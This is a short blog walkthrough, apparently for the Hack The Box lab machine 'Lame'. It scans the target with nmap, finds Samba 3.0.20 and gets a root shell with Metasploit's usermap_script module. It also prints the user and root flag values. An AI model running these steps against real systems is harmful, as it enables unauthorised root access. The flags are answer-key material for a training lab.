top of page
Search

Lame

  • Admin
  • Jan 9, 2022
  • 1 min read

Updated: Jul 10, 2023


Enumeration


As usual, let's start with nmap

nmap -sV -sC 10.10.10.3
ree

This tells us to use -Pn. Let's try:

nmap -sV -sC -Pn 10.10.10.3
ree

ree

nmap tells us that port 445 is open which is associated with Samba and the version is samba 3.0.20

Let's google "samba 3.0.20 exploit" and see if there is something available. Looks like there is one and we can access it directly from Metasploit.


Let's load Metasploit using:

msfconsole
search samba 3.0.20
ree

use exploit/multi/samba/usermap_script
ree

show options
ree

We need to set up both RHOSTS and LHOST

set RHOSTS 10.10.10.3
ree

10.10.10.3 is the IP of the target machine

set LHOST 10.10.14.12
ree

LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different

exploit
ree

It worked! We got a shell on the target machine now. 

whoami
ree

we are root!

ls
cd home
ls
cd makis
ls
cat user.tx
ree

856c4e7468499c31b63029bec549af33

Congratulations! You got the user flag!


Now let's look for the root flag

cd /root
cat user.txt
cat root.txt
ree

674dfcc1c188d43df6664b6fa8ab3a35

Congratulations! You got the root flag!

 
 
 

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating

©2025 by My Tech On IT

bottom of page